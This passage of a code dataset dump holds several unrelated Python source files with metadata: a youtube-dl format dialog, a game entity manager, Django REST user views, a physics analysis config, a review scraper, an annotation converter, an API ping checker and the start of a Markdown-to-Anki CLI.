self.model.layoutChanged.emit()\n\n self.accept()\n\n def btnGetInfoClick(self):\n # Load movie's info\n # https://www.youtube.com/watch?v=G6bSu02Fmxo - Кухня\n # https://www.youtube.com/watch?v=1IEfCoGnTow - 100 Years of Flight Attendant Uniforms\n # default format: -o '%(title)s-%(id)s.%(ext)s'\n # youtube-dl -j --flat-playlist\n\n videoUrl = self.urlEdit.text()\n process_output = subprocess.check_output([\"youtube-dl\", \"-F\", videoUrl], universal_newlines=True)\n # print(process_output + \"\\n\\n~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\\n\\n\")\n lines = process_output.split(\"\\n\")\n for line in lines:\n matchLine = re.match(r'^(\\d+)\\s', line, re.M | re.I)\n if matchLine:\n # print (matchLine.group(1), \" -> \", line)\n self.listOfFormatsWidget.addItem(matchLine.group(1) + \" -> \" + line)\n self.formats.append(line)\n\n fw = 2 * self.listOfFormatsWidget.frameWidth()\n self.listOfFormatsWidget.setFixedSize(self.listOfFormatsWidget.sizeHintForColumn(0) + fw,\n self.listOfFormatsWidget.sizeHintForRow(0) * self.listOfFormatsWidget.count() + fw)\n # QMessageBox.information(self, \"btnGetInfoClick\", \"You clicked: \")\n","sub_path":"AddDlg.py","file_name":"AddDlg.py","file_ext":"py","file_size_in_byte":4422,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"16"} +{"seq_id":"232004226","text":"\"\"\"Module for entity related stuff\"\"\"\n#Python imports\nfrom time import time\n\n#Game imports\nfrom vectors import Vector\nfrom utilities import class_name\nfrom graphics import COLOR_WHITE\nfrom utilities import class_name, encode_word, decode_word, encode_long, decode_long, encode_string, decode_string, get_logger\n\nclass EntityManager(object):\n \"\"\"Stores all entities and controls the pool, also propagates the update and draw functions\"\"\"\n def __init__(self, world):\n self.__log = get_logger(\"entity_manager\")\n self.__world = world\n\n def start(self):\n \"\"\"Initializes the entity storages and uids\"\"\"\n 
self.__entities = {} #All entities existing, non deleted and deleted, categorized by their uid\n self.__reusable = {} #Entities that are with Delete flag, each class name has a list of reusable entities, same as __entities organization\n self.__uid = 0 #Global uid for entities\n self.__entity_classes = {}\n for entity_cls in ENTITY_CLASSES:\n name = class_name(entity_cls)\n self.__entity_classes[name] = entity_cls\n\n def close(self):\n \"\"\"Called when the entity manager is closed\"\"\"\n self.__entities = None\n self.__reusable = None\n self.__uid = None\n self.__entity_classes = None\n\n def __get_uid(self):\n \"\"\"Generates a unique id for a entity\"\"\"\n uid = self.__uid\n self.__uid = uid + 1\n return uid\n\n def use_entity(self, entity_class, force_uid = None):\n \"\"\"Creates or reused a entity of same class\"\"\"\n name = class_name(entity_class)\n entity = None\n reused = False #True if the entity is reused\n if name in self.__reusable.keys():\n reusable = self.__reusable[name] #Get all entities that are reusable with the same classname\n if len(reusable) != 0: #Get an reusable entity from the list\n entity = reusable.pop()\n reused = True\n else: #If there is no an list for the classname, make one\n self.__reusable[name] = []\n\n if entity == None: #There was no luck getting a reusable entity, lets create a new one\n uid = self.__get_uid() if force_uid == None else force_uid\n entity = entity_class(uid, self.__world)\n\n if reused:\n text = \"Reused\"\n else:\n text = \"Created\"\n self.__log.debug(\"%s entity '%s' in '%s' with uid '%i'\" % (text, name, hex(id(entity)), entity.get_uid()))\n\n self.__entities[entity.get_uid()] = entity\n\n return entity, reused\n\n def deserialize_entity(self, uid, data):\n \"\"\"deserializes a entity\"\"\"\n index = 0\n name, index = decode_string(data, index)\n data = data[index:] #Remove the UID and class name from data\n if uid in self.__entities.keys(): #UID exists already\n entity = self.__entities[uid]\n else:\n 
cls = self.__entity_classes[name]\n entity = self.use_entity(cls, uid)[0]\n\n if uid != entity.get_uid():\n raise ValueError(\"Entity %s has uid %s but serialized data was for %s\" % (entity, entity.get_uid(), uid))\n if name != class_name(entity):\n raise ValueError(\"Entity %s has cls %s but serialized data was for %s\" % (entity, class_name(entity), name))\n\n def serialize_entity(self, uid):\n \"\"\"serializes a entity\"\"\"\n entity = self.__entities[uid]\n #Start with the class name\n data = encode_string(class_name(entity))\n #Sum the entity serialization data\n data = data + entity.serialize()\n return data\n\n def update(self):\n \"\"\"Calls update for all active entities and moves to self.__reusable if they are with delete flag\"\"\"\n for entity in self.__entities.values():\n name = class_name(entity)\n if entity not in self.__reusable[name]: #Check if is not in reusable dict\n if entity.delete: #Deleted and not in reusable dict? append it\n self.__reusable[name].append(entity)\n else:\n entity.update()\n\n def draw(self):\n \"\"\"Calls draw for all active entities\"\"\"\n for entity in self.__entities.values():\n if not entity.delete: #Render if is not deleted\n entity.draw()\n\n def get_entities(self):\n \"\"\"Get entity list\"\"\"\n return self.__entities\n\n def get_entity(self, uid):\n \"\"\"Returns the asociated entity instance by uid\"\"\"\n return self.__entities[uid]\n\nclass Entity(object): # pylint: disable=R0902\n \"\"\"The entity class which all entities in the world are subclassed, the only authorized to say \"I'm your father\" quote to everybody\"\"\"\n def __init__(self, uid, world):\n self.__uid = uid\n self.__world = world\n self.__load()\n self.init()\n\n def __load(self):\n \"\"\"Loads data when entity is created, doesn't run when entity is reused, ideal for image loading for example\"\"\"\n pass\n\n def init(self):\n \"\"\"Values that are used for managing the entity in update(), also they are reset for reusing the object 
instance\"\"\"\n self.health = 100 #Health of entity\n self.max_health = 100 #Maximum health level\n self.nodamage = False #Makes the entity indestructible (sets the health to maximum every update and ignores health < 0)\n self.team = None #Team of the entity belongs\n self.delete = False #Deletion flag, when its True, means that it can be reused, also with this true, update and draw is not called\n\n #Private or immutable values,\n self.__pos = Vector(0, 0) #The actual position of the unit\n self.__prev_pos = Vector(0, 0) #The previous position before a net update, used for interpolation\n self.__heading = 0 #Heading of the unit\n self.__prev_heading = 0 #Previous heading of unit, used for interpolation\n\n #Values that are not send during serialization\n self.__image = None #Contains Surface of actual frame\n self.__net_contact = time() #The last network update, used for interpolation\n\n def get_uid(self):\n \"\"\"Returns the entity's unique id\"\"\"\n return self.__uid\n\n @property\n def pos(self):\n \"\"\"Get the position\"\"\"\n return self.__pos\n\n @pos.setter\n def pos(self, pos, update_prev = True):\n \"\"\"Set the position\"\"\"\n if update_prev:\n self.__prev_pos = pos\n self.__pos = Vector(pos)\n\n @property\n def heading(self):\n \"\"\"Get the heading\"\"\"\n return self.__heading\n\n @heading.setter\n def heading(self, heading, update_prev = True):\n \"\"\"Set the heading\"\"\"\n if update_prev:\n self.__prev_heading = heading\n self.__heading = heading\n\n def update(self):\n \"\"\"Called when the entity is updated\"\"\"\n self.health_update()\n\n def health_update(self):\n \"\"\"Checks health\"\"\"\n if self.nodamage:\n self.health = self.max_health\n elif (self.health <= 0):\n self.delete = True\n\n def draw(self):\n \"\"\"Called when the entity needs to be drawed\"\"\"\n graphics = self.__world.graphics\n graphics.draw_circle(COLOR_WHITE, self.__pos.round(), 5)\n\n def serialize(self):\n \"\"\"Called when needs to serialize this entity\"\"\"\n 
#Add the positions and heading\n x, y = self.pos.round()\n data = encode_word(x)\n data = data + encode_word(y)\n data = data + encode_word(self.heading)\n return data\n\n def deserialize(self, data):\n \"\"\"Called when needs to deserialize information on this entity\"\"\"\n #Get the x y coordinates and heading in first 3 words bytes\n index = 0\n self.x = decode_word(data[index:index+2])\n index = index + 2\n self.y = decode_word(data[index:index+2])\n index = index + 2\n self.heading = decode_word(data[index:index+2])\n\n def net_update(self):\n \"\"\"Update the network contact time\"\"\"\n self.__net_contact = time()\n\nclass Unit(Entity):\n \"\"\"A class for generic tank\"\"\"\n def __load(self):\n pass\n\nclass Tank(Unit):\n \"\"\"A class for generic tank\"\"\"\n def __load(self):\n pass\n\nENTITY_CLASSES = (\n Entity,\n Unit,\n Tank,\n)\n\nif __name__ == '__main__': from main import init_main; init_main()\n","sub_path":"src/entities.py","file_name":"entities.py","file_ext":"py","file_size_in_byte":8493,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"16"} +{"seq_id":"37939944","text":"from rest_framework import serializers\n\nfrom .models import Author\n\n\nclass AuthorSerializer(serializers.ModelSerializer):\n picture = serializers.SerializerMethodField(source=\"picture\", method_name=\"get_picture\")\n class Meta:\n model = Author\n fields = [\"id\", \"name\", \"picture\"]\n read_only_fields = [\"id\", \"picture\"]\n\n def get_picture(self, obj):\n if not obj.picture:\n return None\n\n return self.context[\"request\"].build_absolute_uri(obj.picture.url)\n\n\nclass PictureAuthorSerializer(serializers.ModelSerializer):\n class Meta:\n model = Author\n fields = [\"picture\"]\n","sub_path":"app/author/serializers.py","file_name":"serializers.py","file_ext":"py","file_size_in_byte":633,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"16"} +{"seq_id":"453220338","text":"from 
JChaves.Tools.CMSTools import *\nimport JChaves.Tools.Samples as Samples\nimport os,glob,sys\nimport FWCore.ParameterSet.Config as cms\n\nttbar = 'ttbar' in sys.argv\ndyjets = 'dyjets' in sys.argv\nsubmit = 'submit' in sys.argv\n\nprocess = cms.Process(\"ANA\")\n\nprocess.load(\"FWCore.MessageService.MessageLogger_cfi\")\nprocess.MessageLogger.cerr.FwkReport.reportEvery = 1000\n\nprocess.maxEvents = cms.untracked.PSet( input = cms.untracked.int32(-1) )\n\nprocess.source = cms.Source(\"PoolSource\",\n fileNames=cms.untracked.vstring('root://cmsxrootd-site.fnal.gov//store/mc/Summer12/WRToNuLeptonToLLJJ_MW-3500_MNu-1750_TuneZ2star_8TeV-pythia6-tauola/GEN-SIM/START50_V13-v2/0000/04317A88-1FA2-E111-8D7A-485B39897242.root'),\n )\n# This only works interactively\nmass = '_'\nif not ttbar and not dyjets:\n for m in sys.argv:\n if '00' in m:\n mass = '_'+m\ndset = ''\nfor s in Samples.signal_samples:\n if mass in s.name:\n dset = s.dataset\n \n#process.source.fileNames = file_list(dset+'step4_PAT*.root',True)\n#process.source.fileNames = file_list('/DYJetsToLL_M-50_13TeV-madgraph-pythia8/Phys14DR-PU20bx25_PHYS14_25_V1-v1/MINIAODSIM',False)\n#process.source.fileNames = file_list('/eos/uscms/store/user/jchaves/Nstep_EE_2000_reco/EXO-Phys14DR-00009_*.root',True)\nprocess.source.fileNames = file_list('/eos/uscms/store/user/jchaves/Nstep_MUMU_2000_reco/EXO-Phys14DR-00009_*.root',True)\n#process.source.fileNames = file_list('/eos/uscms/store/user/jchaves/Nstep_MUMU_3000_reco/EXO-Phys14DR-00009_*.root',True)\n#process.source.fileNames = file_list('/eos/uscms/store/user/jchaves/Nstep_MUMU_4000_reco/EXO-Phys14DR-00009_*.root',True)\n#process.source.fileNames = file_list('/eos/uscms/store/user/jchaves/Nstep_MUMU_5000_reco/EXO-Phys14DR-00009_*.root',True)\n#process.source.fileNames = file_list('/eos/uscms/store/user/jchaves/Nstep_MUMU_6000_reco/EXO-Phys14DR-00009_*.root',True)\noutfile = 'resolution_EXO_MUMU.root'\n\nif ttbar:\n process.source.fileNames = 
file_list(Samples.ttbar_samples[0].dataset,False)\n outfile = 'resolution_ttbar.root'\n process.maxEvents = cms.untracked.PSet( input = cms.untracked.int32(10000) )\n\nif dyjets:\n process.source.fileNames = file_list(Samples.dyjets_samples[0].dataset,False)\n outfile = 'resolution_dyjets.root'\n process.maxEvents = cms.untracked.PSet( input = cms.untracked.int32(10000) )\n\nprocess.TFileService = cms.Service('TFileService', fileName = cms.string(outfile))\n\nprocess.load('JChaves.WR_Analyzer.resolution_cfi')\n\nprocess.p = cms.Path(process.ana)\n\n\n###################################################################################################\n###################################################################################################\n# Use my CRABSubmitter for now:\n# crab2_submit(name,nevents,name modifiers)\n# name = nstep -> MakeSamples\n# name = ttbar\n# name = dyjets\nif __name__ == '__main__' and hasattr(sys, 'argv') and submit:\n from JChaves.Tools.CRABSubmitter import *\n \n if ttbar:\n #crab2_submit('ttbar',-1,'all')\n crab3_submit('ttbar',-1,'all')\n if dyjets:\n #for x in ['HT-100To200','HT-200To400','HT-400To600','HT-600ToInf']:\n for x in ['M-200To400','M-400To800','M-800To1400','M-1400To2300','M-3500To4500','M-4500To6000','M-6000To7500','M-7500To8500',]:\n #crab2_submit('dyjets',-1,x)\n crab3_submit('dyjets',-1,x)\n","sub_path":"WR_Analyzer/test/resolution.py","file_name":"resolution.py","file_ext":"py","file_size_in_byte":3432,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"16"} +{"seq_id":"407218396","text":"from rest_framework import generics, views, status\nfrom rest_framework.permissions import AllowAny\nfrom rest_framework.response import Response\n\n\nfrom .models import User\nfrom .permissions import AdminPermission\nfrom .serializers import (\n UserSerializer,\n RestrictedUserSerializer,\n UserRegisterSerializer,\n UserConfirmSerializer,\n)\n\n\nclass 
UserList(generics.ListCreateAPIView):\n\n serializer_class = UserSerializer\n permission_classes = [AdminPermission, ]\n queryset = User.objects.all()\n\n\nclass UserDetail(generics.RetrieveUpdateDestroyAPIView):\n\n serializer_class = UserSerializer\n permission_classes = [AdminPermission, ]\n queryset = User.objects.all()\n\n\nclass RestrictedUserDetail(generics.RetrieveUpdateAPIView):\n\n serializer_class = RestrictedUserSerializer\n\n def get_object(self):\n return self.request.user\n\n\nclass UserRegisterView(views.APIView):\n\n permission_classes = [AllowAny,]\n serializer_class = UserRegisterSerializer\n\n def post(self, request):\n serializer = self.serializer_class(data=request.data)\n if not serializer.is_valid():\n return Response(serializer.errors, status.HTTP_400_BAD_REQUEST)\n serializer.save()\n\n return Response(serializer.data, status.HTTP_200_OK)\n\n\nclass UserConfirmView(views.APIView):\n\n permission_classes = [AllowAny,]\n serializer_class = UserConfirmSerializer\n\n def put(self, request):\n serializer = self.serializer_class(data=request.data)\n if not serializer.is_valid():\n return Response(serializer.errors, status.HTTP_400_BAD_REQUEST)\n email = serializer.validated_data.get('email')\n token = serializer.validated_data.get('app_id')\n user = User.objects.filter(email=email, app_id=token).first()\n if not user:\n body = {'deteils': 'INCORRECT_TOKEN'}\n return Response(body, status.HTTP_400_BAD_REQUEST)\n user.is_confirmed = True\n user.save()\n return Response(serializer.data, status.HTTP_200_OK)\n","sub_path":"test_app/users/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":2034,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"16"} +{"seq_id":"593709688","text":"# -*- coding: utf8 -*-\nfrom alascrapy.spiders.base_spiders.ala_spider import AlaSpider\n\nTEST_SCALE = 100\n\n# Note that OriginalCategoryName is hardcoded to electronik.\n\n\nclass 
TestberichteBlogger_deSpider(AlaSpider):\n name = 'testberichte-blogger_de'\n allowed_domains = ['testberichte-blogger.de']\n start_urls = ['http://www.testberichte-blogger.de/elektronik']\n\n def parse(self, response):\n sub_category_urls = self.extract_list(response.xpath(\n \"//div[@class='randrund']/p/a/@href|//div[\"\n \"@class='content']/p/a/@href\"))\n\n if sub_category_urls:\n for sub_category_url in sub_category_urls:\n yield response.follow(sub_category_url,\n callback=self.parse_category)\n\n def parse_category(self, response):\n date_xpath = self.extract(response.xpath(\n \"substring-after(//div/h1, '(')\"))\n date = date_xpath.split(')')\n date = date[0]\n category_item_xpath = \"//td/a/@href\"\n category_item_urls = self.extract_list(response.xpath(\n category_item_xpath))\n\n for category_item_url in category_item_urls:\n yield response.follow(category_item_url,\n callback=self.parse_review_product,\n meta={'date': date})\n\n def get_product_name(self, response):\n name_xpath = self.extract(response.xpath(\"//h1/text()\"))\n name = name_xpath.split(u'–')\n if name[0]:\n productname = name[0].replace('Test', '')\n else:\n productname = name_xpath.replace('Test', '')\n\n return productname\n\n def parse_review_product(self, response):\n product_xpaths = {\n 'PicURL': '(//div/a/img)[1]/@src',\n 'source_internal_id': \"substring-after(//link[@rel='shortlink']\"\n \"/@href, '=')\"\n }\n\n product = self.init_item_by_xpaths(response, 'product', product_xpaths)\n\n product[\"ProductName\"] = self.get_product_name(response)\n\n product[\"OriginalCategoryName\"] = \"elektronik\"\n\n yield product\n\n review_xpaths = {\n 'TestTitle': '//h1/text()',\n 'source_internal_id': \"substring-after(//link[@rel='shortlink']\"\n \"/@href, '=')\",\n \"SourceTestRating\": \"substring-before(\"\n \"//td/strong/strong/text(),'%')\",\n 'TestSummary': '//p/i/text()',\n 'TestPros': \"//div/span[contains(text(),'+')]/text()|\"\n 
\"//div/span/font/font[contains(text(),'+')]/text()\",\n 'TestCons': \"//div/span[contains(text(),' - ')]/text()|\"\n \"//div/span/font/font[contains(text(),' - ')]/text()|\"\n u\"//div/span[contains(text(),'– ')]/text()\"\n }\n\n review = self.init_item_by_xpaths(response, 'review', review_xpaths)\n\n date = response.meta['date']\n\n if date:\n review[\"TestDateText\"] = date\n\n if review[\"SourceTestRating\"]:\n review[\"SourceTestScale\"] = TEST_SCALE\n\n if review[\"TestCons\"]:\n review[\"TestCons\"] = review[\"TestCons\"].replace('-', ''\n ).replace(u'–', '')\n\n if review[\"TestPros\"]:\n review[\"TestPros\"] = review[\"TestPros\"].replace('+', '')\n\n review[\"ProductName\"] = self.get_product_name(response)\n\n review['DBaseCategoryName'] = 'PRO'\n\n yield review\n","sub_path":"alascrapy/spiders/testberichte-blogger_de.py","file_name":"testberichte-blogger_de.py","file_ext":"py","file_size_in_byte":3459,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"16"} +{"seq_id":"18902621","text":"from bs4 import BeautifulSoup\r\nfrom imutils import paths\r\nimport os\r\n\r\n# initialize the base path for the logos dataset\r\nBASE_PATH = \"./\"\r\n\r\nannot_path = \"SIMS_VOC_Annotations2/all_annot_xml/\"\r\n\r\n# build the path to the annotations and input images\r\ntrain_images_path = \"SIMS_Dataset/train_images/\"\r\nval_images_path = \"SIMS_Dataset/validation_images/\"\r\ntest_images_path = \"SIMS_Dataset/test_images/\"\r\n\r\n# build the path to the output training and test .csv files\r\ntrain_csv = os.path.sep.join([BASE_PATH, 'train.csv'])\r\nval_csv = os.path.sep.join([BASE_PATH, 'val.csv'])\r\ntest_csv = os.path.sep.join([BASE_PATH, 'test.csv'])\r\n\r\n# build the path to the output classes CSV files\r\nclasses_csv = os.path.sep.join([BASE_PATH, 'classes.csv'])\r\n\r\n# build the path to the output predictions dir\r\noutput_dir = os.path.sep.join([BASE_PATH, 'predictions'])\r\n\r\ntrain_image_paths = 
list(paths.list_files(train_images_path))\r\nval_image_paths = list(paths.list_files(val_images_path))\r\ntest_image_paths = list(paths.list_files(test_images_path))\r\n# print(val_image_paths)\r\n\r\n# create the list of datasets to build\r\ndataset = [ (\"train\", train_image_paths, train_csv),\r\n (\"val\", val_image_paths, val_csv),\r\n (\"test\", test_image_paths, test_csv)]\r\n# initialize the set of classes we have\r\nCLASSES = set()\r\n\r\nfor (dType, imagePaths, outputCSV) in dataset:\r\n # load the contents\r\n print(\"[INFO] creating '{}' set...\".format(dType))\r\n print(\"[INFO] {} total images in '{}' set\".format(len(imagePaths), dType))\r\n\r\n # open the output CSV file\r\n csv = open(outputCSV, \"w\")\r\n\r\n # loop over the image paths\r\n for imagePath in imagePaths:\r\n # build the corresponding annotation path\r\n fname = imagePath.split(os.path.sep)[-1]\r\n fname = \"{}.xml\".format(fname[:fname.rfind(\".\")])\r\n annotPath = os.path.join(annot_path, os.path.basename(fname))\r\n\r\n # load the contents of the annotation file and buid the soup\r\n contents = open(annotPath).read()\r\n soup = BeautifulSoup(contents, \"html.parser\")\r\n\r\n # extract the image dimensions\r\n w = int(soup.find(\"width\").string)\r\n h = int(soup.find(\"height\").string)\r\n\r\n for o in soup.find_all(\"object\"):\r\n #extract the label and bounding box coordinates\r\n label = o.find(\"name\").string\r\n xMin = int(float(o.find(\"xmin\").string))\r\n yMin = int(float(o.find(\"ymin\").string))\r\n xMax = int(float(o.find(\"xmax\").string))\r\n yMax = int(float(o.find(\"ymax\").string))\r\n\r\n # truncate any bounding box coordinates that fall outside\r\n # the boundaries of the image\r\n xMin = max(0, xMin)\r\n yMin = max(0, yMin)\r\n xMax = min(w, xMax)\r\n yMax = min(h, yMax)\r\n\r\n # ignore the bounding boxes where the minimum values are larger\r\n # than the maximum values and vice-versa due to annotation errors\r\n if xMin >= xMax or yMin >= yMax:\r\n 
continue\r\n elif xMax <= xMin or yMax <= yMin:\r\n continue\r\n\r\n # write the image path, bb coordinates, label to the output CSV\r\n row = [os.path.abspath(imagePath),str(xMin), str(yMin), str(xMax),\r\n str(yMax), str(label)]\r\n csv.write(\"{}\\n\".format(\",\".join(row)))\r\n\r\n # update the set of unique class labels\r\n CLASSES.add(label)\r\n\r\n # close the CSV file\r\n csv.close()\r\n\r\n print(\"[INFO] writing classes...\")\r\n csv = open(classes_csv, \"w\")\r\n rows = [\",\".join([c, str(i)]) for (i, c) in enumerate(CLASSES)]\r\n csv.write(\"\\n\".join(rows))\r\n csv.close()","sub_path":"Faster RCNN/voc_2_csv.py","file_name":"voc_2_csv.py","file_ext":"py","file_size_in_byte":3687,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"16"} +{"seq_id":"169647869","text":"# -*- coding: utf-8 -*-\n\nimport os\nimport argparse\nimport numpy as np\nimport spacy_udpipe\nimport pandas as pd\nimport copy\n\nfrom MWEPreProcessor import MWEPreProcessor\nfrom WordEmbedding import set_fastText_word_embeddings\nfrom Operations import load_pickle, get_logger, dump_pickle\nfrom MWEIdentifier import MWEIdentifier\n\nclass ERMIEvaluate:\n def __init__(self, root_path):\n self.lang = 'TR'\n self.tag = 'gappy-crossy'\n self.embedding_type = 'headend'\n self.root_path = root_path\n self.input_path = self.root_path\n self.output_path = os.path.join(self.root_path, 'output', self.lang)\n gensim_name = \"gensim_\" + self.lang.lower()\n self.gensim_we_path = os.path.join(self.root_path, 'TR_model/Embeddings', gensim_name)\n\n self.mwe_write_path = os.path.join(self.root_path, \"output\")\n\n if not os.path.exists(self.mwe_write_path):\n os.makedirs(self.mwe_write_path)\n\n self.mwe_train_path = os.path.join(self.root_path, 'TR_model', 'train.pkl')\n\n self.logger = get_logger(os.path.join(self.root_path, 'TR_model'))\n\n self.params = { 'TR': {'n_units': 20, 'dropout': [0.1, 0.1], 'batch_size': 32, 'epochs': 20},\n }\n\n self.mwe = 
load_pickle(self.mwe_train_path)\n \n self.mwe_identifier = MWEIdentifier(self.lang, self.embedding_type, self.mwe, self.logger, self.mwe_write_path)\n self.mwe_identifier.set_params(self.params[self.lang])\n self.mwe_identifier.set_train()\n self.mwe_identifier.build_model()\n \n def evaluate(self, sentence):\n \n nlp = spacy_udpipe.load_from_path(lang=\"tr\",\n path=\"./turkish-imst-ud-2.4-190531.udpipe\",\n meta={\"description\": \"Custom 'tr' model\"})\n text = sentence\n\n doc = nlp(text)\n udpiped_sentence = [(token.i + 1, token.text, token.lemma_, token.pos_, \"_\", \"_\", str(token.head), token.dep_.lower(), \"_\", \"_\", \"_\") for token in doc]\n self.mwe.test_sentences = [udpiped_sentence]\n new_corpus = pd.DataFrame(udpiped_sentence, columns=['ID', 'FORM', 'LEMMA', 'UPOS', 'XPOS', 'FEATS', 'HEAD', 'DEPREL',\n 'DEPS', 'MISC', 'PARSEME:MWE'])\n new_corpus['BIO'] = copy.deepcopy(new_corpus['PARSEME:MWE'])\n new_corpus[new_corpus['BIO'].isnull()] = 'space'\n new_corpus['BIO'] = copy.deepcopy(new_corpus['BIO'].apply(lambda x: x.strip()))\n space_row = {'ID':'space', 'FORM':'space', \"LEMMA\":'space', \"UPOS\":'space', \"XPOS\":'space', \"FEATS\":'space', \"HEAD\":'space', \"DEPREL\":'space', \"DEPS\":'space', \"MISC\":'space', \"PARSEME:MWE\":'space', \"BIO\":'space'}\n test_corpus = new_corpus.append(space_row, ignore_index=True)\n self.mwe._test_corpus = test_corpus\n \n self.mwe_identifier.mwe = self.mwe\n self.mwe_identifier.set_test()\n reload_path = os.path.join(self.root_path, 'TR_model', 'teacher-weights-last.hdf5')\n lines = self.mwe_identifier.predict_test_custom_model(reload_path)\n \n return lines\n","sub_path":"ERMIEvaluate.py","file_name":"ERMIEvaluate.py","file_ext":"py","file_size_in_byte":3141,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"16"} +{"seq_id":"585729984","text":"# Copyright (2015-2017) Hewlett Packard Enterprise Development LP\n# Copyright (2015-2017) Universidade Federal de Campina 
Grande\n# All Rights Reserved.\n#\n# Licensed under the Apache License, Version 2.0 (the \"License\"); you may\n# not use this file except in compliance with the License. You may obtain\n# a copy of the License at\n#\n# http://www.apache.org/licenses/LICENSE-2.0\n#\n# Unless required by applicable law or agreed to in writing, software\n# distributed under the License is distributed on an \"AS IS\" BASIS, WITHOUT\n# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the\n# License for the specific language governing permissions and limitations\n# under the License.\n\nimport retrying\n\nfrom oslo_log import log as logging\n\nfrom ironic_oneviewd.conf import CONF\nfrom ironic_oneviewd.node_manager.manage import NodeManager\n\nLOG = logging.getLogger(__name__)\n\n\ndef do_manage_ironic_nodes():\n \"\"\"Show a list of OneView servers to be created as nodes in Ironic.\"\"\"\n node_manager = NodeManager()\n retry_interval_in_ms = CONF.DEFAULT.retry_interval * 1000\n\n @retrying.retry(wait_fixed=retry_interval_in_ms)\n def execute():\n try:\n node_manager.pull_ironic_nodes()\n except Exception as ex:\n LOG.error(ex)\n raise Exception(\"Continue trying...\")\n execute()\n","sub_path":"ironic-oneviewd/ironic_oneviewd/node_manager/commands.py","file_name":"commands.py","file_ext":"py","file_size_in_byte":1365,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"16"} +{"seq_id":"558701672","text":"import logging\nimport requests\nimport json\nfrom datetime import date\n\nclass EstadoPingAPI:\n def __init__(self, env, catalog):\n self._state = 'INITIAL'\n self._status = 200\n self._text = ''\n self._env = env\n if (env == 'pro'):\n self._gw = 'apicp-gateway-vf.internal.vodafone.com'\n else:\n self._gw = 'apict-gateway-vf.internal.vodafone.com'\n self._catalog = catalog\n\n def ping(self):\n resul = ''\n try:\n response = requests.get(\"https://\" + self._gw + \"/vodafone-spain/\"\n + self._catalog + \"/ping/ping\", 
verify=False)\n if (response.status_code != self._status):\n resul = '[' + self._env + '][' + self._catalog + '][' + self._state + '] Status changed from ' + str(self._status) + ' to ' + str(response.status_code)\n self._status = response.status_code\n self._text = ''\n else:\n self._status = response.status_code\n if (response.status_code == 200):\n txt = json.dumps(response.json())\n state = self._state\n self.evalFecha(response.json()[\"fecha\"])\n if (state != self._state or self._text != txt):\n self._text = txt\n resul = '[' + self._env + '][' + self._catalog + '][' + self._state + '] ' + txt\n except:\n logging.exception('Exception calling API')\n resul: 'Error de conexión'\n finally:\n return resul\n \n def evalFecha(self, fecha):\n if (len(fecha) and fecha[6:8] == date.today().strftime('%d')):\n self._state = 'OK'\n else:\n self._state = 'KO'\n","sub_path":"apiConnect/EstadoPingAPI.py","file_name":"EstadoPingAPI.py","file_ext":"py","file_size_in_byte":1764,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"16"} +{"seq_id":"186109733","text":"import sys\n\nfrom generators import Generator\nfrom plugins import load_plugins\n\n\ndef find_parser(url, args):\n plugins = load_plugins()\n for plugin in plugins:\n if plugin.can_handle(url):\n return plugin.get_parser(url, args)\n raise Exception(\"No plugin for URL: %s\" % url)\n\n\ndef parse_args():\n args_len = len(sys.argv)\n if args_len > 1:\n url = sys.argv[1]\n else:\n raise Exception(\"First argument: URL\")\n args = args_len > 2 and sys.argv[2:]\n return url, args\n\n\nif __name__ == '__main__':\n url, args = parse_args()\n parser = find_parser(url, args)\n generator = Generator(parser)\n generator.write_xml(sys.stdout)\n","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":677,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"16"} +{"seq_id":"491709676","text":"import hashlib\nimport itertools\nimport 
os\nimport re\nfrom pathlib import Path\n\nimport frontmatter\nimport genanki\nimport markdown\nimport typer\nfrom bs4 import BeautifulSoup, Comment\nfrom bs4.element import Tag\nfrom genanki.deck import Deck\nfrom genanki.model import Model\n\nfrom markdown_anki_decks.sync import sync_deck, sync_model\nfrom markdown_anki_decks.utils import print_success\n\napp = typer.Typer()\n\n\ndef version_callback(value: bool):\n from . import __version__\n\n if value:\n typer.echo(f\"Markdown Anki Decks: {__version__}\")\n raise typer.Exit()\n\n\n@app.command(\"convert\")\ndef convertMarkdown(\n input_dir: Path = typer.Argument(\n ...,\n help=\"The input directory. Contains markdown files which will be converted to anki decks.\",\n ),\n output_dir: Path = typer.Argument(\n ..., help=\"The output directory. Anki .apkg files will be written here.\"\n ),\n sync: bool = typer.Option(\n False,\n \"--sync\",\n help=\"Whether or not to synchronize the output with anki using anki connect.\",\n ),\n deck_title_prefix: str = typer.Option(\n \"\",\n \"--prefix\",\n help=\"Can be used to make your markdown decks part of a single subdeck. Anki uses `::` to indicate sub decks. `markdown-decks::` could be used to make all generated decks part of a single root deck `markdown-decks`\",\n ),\n delete_cards: bool = typer.Option(\n False,\n \"--delete\",\n help=\"Whether to delete cards from anki during sync. 
